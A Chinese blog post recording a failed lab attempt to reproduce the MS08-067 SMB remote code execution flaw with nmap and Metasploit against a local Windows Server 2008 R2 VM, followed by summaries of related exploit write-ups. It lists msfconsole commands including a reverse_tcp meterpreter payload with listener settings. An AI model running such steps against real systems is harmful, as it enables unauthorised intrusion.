微软服务器代码执行漏洞复现,远程代码执行MS08-067漏洞复现失败过程

最新推荐文章于 2023-03-25 16:32:39 发布
最新推荐文章于 2023-03-25 16:32:39 发布
阅读量806 收藏 1
点赞数
文章标签: 微软服务器代码执行漏洞复现
本文记录了一次尝试复现MS08-067远程代码执行漏洞的过程,该漏洞影响多个Windows版本。在Kali Linux攻击机上使用Metasploit框架,尝试对Windows Server 2008 R2靶机进行攻击,但因缺少针对该特定系统的exploit模块或语言问题导致复现失败。作者推测可能需要使用不同版本或英文版的Windows系统来成功复现此漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

远程代码执行MS08-067漏洞复现失败过程

漏洞描述:

如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在微软服务器系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。

漏洞原理:

MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中存在的逻辑错误,造成栈缓冲区可被溢出,而获得远程代码执行(Remote Code Execution)。原文链接:

影响版本:

Windows 2000、XP、Server 2003、Vista、Server 2008、Windows 7 Beta

漏洞复现:

攻击机:kali-linux-2020.2-installer-amd64(IP:192.168.161.130)

靶机:windows_server_2008_r2_enterprise_with_sp1_x64(IP:192.168.161.129)

复现过程:

主机发现

打开Kali Linux,输入命:nmap 192.168.161.1/24 扫描目标网段,获取目标信息。

4491cfca454d31d58f5293c6d307b872.png

命令:nmap -O 192.168.161.129 获取目标操作系统信息

bbba0e1a2f656eee852179976c7d62d8.png

开启Kali中的MSF攻击框架,命令:msfconsole  这将显示攻击框架的版本信息攻击载荷的数量等

a22161c6d727aa020d2758f05f78fb3d.png

搜索攻击模块:search ms08-067

9092f5ba76f98bd30de844e29d16b204.png

(1)use exploit/windows/smb/ms08_067_netapi

(2)show options

278a159eff3de6fb5c727ae11597024b.png

(3)show targets 查看该模块支持攻击的操作系统

8ddb92b81588239a1243e57fc9f8c792.png

设置目标IP

cd2d933cbf31d3b8b05749045af80ca8.png

看了下别人的复现过程,在上面的步骤需要先设置载荷:1.set payload windows/meterpreter/reverse_tcp    再设置本地监听IP和端口:2.set lhost 192.168.161.130    3.set lport 4444 4.set target

但我这里都已经默认设置好了,所以就是简单的设置一个目标IP就行了。

值得一提的是,在show targets里面,我并没有发现针对Windows-Server-2008-R2的id编号,所以这里就没有set target。

fa79ff7154991eecf8136b192837f34a.png

很显然,实验复现失败了。不确定是因为该模块并没有针对这个系统的exploit,还是因为这个系统版本是中文的,而模块支持默认是英文的。看来得装个XP或者2003才行,而且装的系统版本最好是英文版,exploit支持的语言大多默认是英文版。

原文:https://www.cnblogs.com/Candy123/p/13728974.html

[漏洞挖掘与防护] 02.漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
07-14 1230
上一篇文章将详细介绍Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程,它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。希望对入门的同学有帮助。
[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
12-28 9907
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。
失败的,最详细的进攻MS08-067漏洞的前期准备工作
qq_48818099的博客
05-22 1180
详细失败MS08-067漏洞讲解与进攻;
MS 08-067失败过程记录
weixin_51387754的博客
06-20 489
建好后开启使用enter FN+F8我同意 由于是选择安装分区。由于我们是新建的虚拟机,所以上面的磁盘是空白的,我们需要先新建分区,按C键新建分区(建议划分2个分区,一个作为系统盘,一个作为数据盘)。 新建分区之后要进行格式化,对C:盘进行格式化。推荐使用NTFS文件系统格式磁盘分区,因为其能支持更多的功能。 格式化完成后虚拟机将自动重启。之后进入安装向导,点击“下一步”。 设置区域及语言,核对一下是否正确。点击“下一步”。 输入姓名或者单位。这个不是很重要,随便填一下就可以。 计算机名默认就.
Windows xp Ms08067漏洞复现
hintll的博客
11-18 4184
准备工作: 虚拟机 kali Windows xp sp3中文版 先ping双方的ip,以确保双方的网络可以互通 nmap扫描Windows 命令: cd /usr/share/nmap/scripts nmap --script=vuln 192.168.XXX.XXX 扫描后有漏洞ms08067 用mts进行攻击 先找漏洞利用: search 08_067 运用漏洞: use exploit/windowsexploit/windows/smb/ms08_067_netapi 看参数: show op
ms08-067漏洞复现
老司机开代码的博客
09-09 5787
文章目录ms08-067简介复现实验环境漏洞利用 ms08-067简介 Windows Server服务RPC请求缓冲区溢出漏洞MS08-067)。 漏洞类别:远程溢出 CVE-ID : 2008-4250 漏洞详情: MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞远程攻击者可以通过发送恶意的RPC请求触发这个溢出,导致完全入侵用户系统,以SYSTEM权限执行任意指令。对于Windo
MS08-067漏洞复现
weixin_41421812的博客
04-28 4090
本篇是一个简单的操作记录,主要是学习下面这篇文章,我只是一个复现Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御 这位老师的文章非常详细且清晰,对我这种初学者也非常友好。 1.实验环境 (虚拟机) 攻击机:kali (渗透工具Metasploit) ; 被攻击:windows xp (445端口); 渗透工具meterpreter准备 service postgresql start      # 启动数据库服务 msfdb init             #
CVE-2022-30190(follina):Microsoft诊断工具(MSDT)远程代码执行漏洞复现(超级详细)
aihiglh的博客
06-15 4232
CVE-2022-30190的复现与使用,由一位中学生独自编写(第一次写文章),干货较多,欢迎收藏和讨论交流
漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)
李火火的安全圈
03-07 9165
文章目录声明前言一、漏洞原理简述二、漏洞代码深层解析三、实验步骤四、漏洞补丁总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 MS17-010 永恒之蓝(远程溢出漏洞) ,该漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码 一、漏洞原理简述 MS17-010漏洞出现在Windows SMB v1中的内核态函数 srv!SrvOs2FeaListToNt 在处理FEA(File Ex
MS08-067 RPC请求缓冲区溢出漏洞利用
alert['Hello World']
11-13 2123
Windows 系统上的服务器服务中存在一个远程执行代码漏洞。 该漏洞是由于服务不正确地处理特制的 RPC 请求导致的。 成功利用此漏洞的攻击者可以完全控制受影响的系统。 影响系统 - Windows Vista - Windows 2000 Service - Windows Server 2008 - Windows Server 2003 - Windows XP
MS08-067 (CVE-2008-4250) 远程命令执行漏洞
李火火的安全圈
03-18 1万+
文章目录前言一、漏洞简介二、影响范围三、漏洞危害四、本地复现五、补丁编号六、 Windows Server 2003 SP2 中文版利用方法七、漏洞原理深度剖析 前言 本文为08年出现的漏洞进行复现,仅作为学习参考,切勿非法利用! 一、漏洞简介 MS08-067漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize 函数时触发的,而NetPathCanonicalize 函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,
渗透- 基于metasploit的内网渗透 - ms08-067漏洞利用及其原理分析
joke_ljh的博客
08-31 2535
ms08-067漏洞利用 内网渗透: 利用漏洞Ms08-067 使用工具metasploit 前提:靶机具有ms08-067漏洞(可以用nessus扫描),在同一局域网,且具有连通性。 基本命令: Use exploit/windows/smb/ms08_067_netapi Set rhost 192.168.10.2 Set lhost 192.168.10.1 Set lport 7777...
MS08_067漏洞复现与总结
马赛克的博客
02-28 6955
00x00 原理:攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 安全补丁:KB958644 00x01 #准备工作 两台虚拟机,一台为kali ip:10.10.10.131 一台为Windowsxpsp3英文版 ip:10.10.1...
ms17-010 ms10-046 ms08-067漏洞利用
weixin_43227251的博客
01-13 1884
2020年1月7日 好了,到了第二天,早上起来的时候心情就是那么的激动 为什么呢,昨天熬夜到3点,终于吧环境搞好了,哎,我太难了! 今天一天主要做的事情是利用kali进行漏洞利用,具体利用过程和步骤如下: ms17-010,ms08-067ms10-046漏洞利用 一. ms17-010 1.漏洞成因:当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个...
渗透测试-[windows-MS08-067MS10-046、MS17-010、MS12-020]
m0_43405474的博客
05-05 3850
MS漏洞攻击实验-MS08-067MS10-046、MS17-010、MS-12-020】0.实验环境1.MS08-067【RPC】1.1 漏洞描述1.2 主机发现1.3 利用MSF通过ms08-067漏洞渗透目标系统1.4 后渗透利用1.查看权限:2.Shell3.添加账号4.将新账号添加到管理员组中5.截屏2.MS10-046【快捷方式自动执行代码】2.1 漏洞描述2.2 渗透攻击2.3 后渗透利用3.MS17-010【SMB】3.1 漏洞描述3.2 渗透攻击3.2.1 目标发现3.2.2 渗透攻击
MS08-067漏洞分析
10-27 4027
 by diyhack 前天看到微软紧急发布了一个漏洞补丁,就去看了下,发现该漏洞影响覆盖面非常广,包括Windows 2000/XP/2003/Vista/2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta,并且漏洞存在于Windows系统默认开启的Server服务当中,而且超越了当年风靡一时的MS06-040漏洞(又想起当年用该漏洞。。。。。。。嘿嘿)。这也难
[网络安全自学篇] 五十九.Windows安全缺陷利用之MS08-067远程代码执行及深度防御解析
热门推荐
杨秀璋的专栏
03-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Windows远程桌面服务漏洞(CVE-2019-0708复现,利用RDP和Metasploit工具反弹shell。本文将讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。本文是一篇CVE漏洞还原的基础性文章,希望对您有所
Windows XP SP2 (Simplified Chinese MS08_067漏洞复现)
qq_43093288的博客
03-25 2246
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,Windows的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞。注:发现Windows XP SP2 (Simplified Chinese)存在多个漏洞:ms17-010,ms08-067,,但是我们现在只考虑ms08-067。注:发现Windows XP SP2 (Simplified Chinese)的IP:172.16.12.101。
复现经典漏洞MS08-067分析与影响
MS08-067漏洞于2008年10月22日被公布,它允许远程攻击者通过发送恶意的RPC请求来触发缓冲区溢出,从而在未授权的情况下获得受害者系统的完全控制权,执行任意系统命令。在某些情况下,如Windows Vista和Server 2008...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值